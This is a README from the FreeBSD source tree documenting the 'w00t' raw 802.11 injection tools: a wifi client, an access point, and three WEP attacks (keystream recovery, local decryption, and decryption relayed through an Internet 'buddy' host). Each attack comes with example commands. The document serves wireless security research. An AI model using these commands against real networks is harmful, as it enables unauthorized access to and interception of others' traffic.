$FreeBSD: src/tools/tools/net80211/w00t/README,v 1.2 2009/07/24 15:31:22 sam Exp $

This is a collection of tools that use raw 802.11 packet injection.
None of the tools configure the interface, so be sure to run something
like:

ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up

beforehand. The following tools are found here:

assoc     A wifi client.
ap        A wifi access point.

prga      Gives ability to transmit on a WEP network.
redir     Gives ability to decrypt in real-time on a WEP network, via Internet.
expand    Gives ability to decrypt locally on a WEP network.

All these tools depend on:

libw00t   Utility functions used by all tools.

Detailed explanation of tools.
==============================

assoc:

Acts as a wifi client. It will associate to a network and bind a
tap interface to it. The interface may be used like a standard eth
interface attached to a normal LAN. Multiple instances of the
program may be run in order to connect to multiple APs simultaneously.
Example:

./assoc -s w00t -t tap0
ifconfig tap0 192.168.0.123 up
ping 192.168.0.1

ap:

The same as assoc, but acts as an access point. Example:

./ap -s w00t -t tap1
ifconfig tap1 192.168.0.1 up
tcpdump -n -i tap1

[For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
for theoretical information.]

prga:

Sniff a packet on a WEP network and obtain a keystream. It binds
to a tap interface which may be used to TX packets on that network.
Example:

./prga -b bssid_of_network -t tap0
ifconfig tap0 192.168.0.123 up
ping 192.168.0.1

redir:

Resend WEP packets to our buddy on the Internet. The buddy will
receive the clear-text and send it back to us via a UDP socket.
This data is then fed back into a tap interface. This way, data
may ultimately be read from the tap iface in clear-text.
Example:

[Box on Internet]~# ./buddy
./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666
ifconfig tap0 up
tcpdump -n -i tap0

expand:

Sniff a WEP packet and do the linear keystream expansion trick to
decrypt it. The clear-text packet is sent to a tap interface.
Example:

./expand -b bssid -t tap0
ifconfig tap0 up
tcpdump -n -i tap0